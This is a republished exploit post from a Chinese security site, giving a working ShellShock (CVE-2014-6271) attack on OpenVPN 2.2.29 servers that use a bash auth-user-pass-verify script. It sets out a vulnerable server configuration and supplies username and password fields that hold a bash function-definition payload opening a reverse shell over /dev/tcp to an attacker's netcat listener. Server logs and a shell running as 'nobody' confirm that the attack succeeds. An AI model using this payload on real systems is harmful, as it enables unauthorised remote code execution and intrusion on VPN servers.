首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenVPN 2.2.29 - ShellShock Exploit
来源:vfocus.net 作者:hobbily 发布时间:2014-10-08  

# Exploit Title: ShellShock OpenVPN Exploit

# Date: Fri Oct  3 15:48:08 EDT 2014

# Exploit Author: hobbily AKA @fj33r

# Version: 2.2.29

# Tested on: Debian Linux

# CVE : CVE-2014-6271

#Probably should of submitted this the day I tweeted it.
### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3

### user.sh
#!/bin/bash
echo "$username"
echo "$password"

### start server
openvpn server.con

### terminal 1
nc -lp 4444

### terminal 2
sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo

### username && password were both shellshocked just incase
user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &

### log
Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:56:56 2014 GID set to nogroup
Mon Sep 29 20:56:56 2014 UID set to nobody
Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__

Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting

### nc listener
nobody@debian:/etc/openvpn$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
#shoutouts to Fredrik Str�mberg for the post he made on ycombinator


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Postfix SMTP - Shellshock Expl
·Bash - CGI RCE (MSF) Shellshoc
·Apache mod_cgi - Remote Exploi
·IPFire Cgi Web Interface Authe
·Kolibri Webserver 2.0 Buffer O
·Wordpress Slideshow Gallery 1.
·GNU bash 4.3.11 Environment Va
·Advanced Information Security
·Pure-FTPd External Authenticat
·OpenSSH 6.6 SFTP Misconfigurat
·HP Network Node Manager I PMD
·Linux Kernel 3.16.1 FUSE Privi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved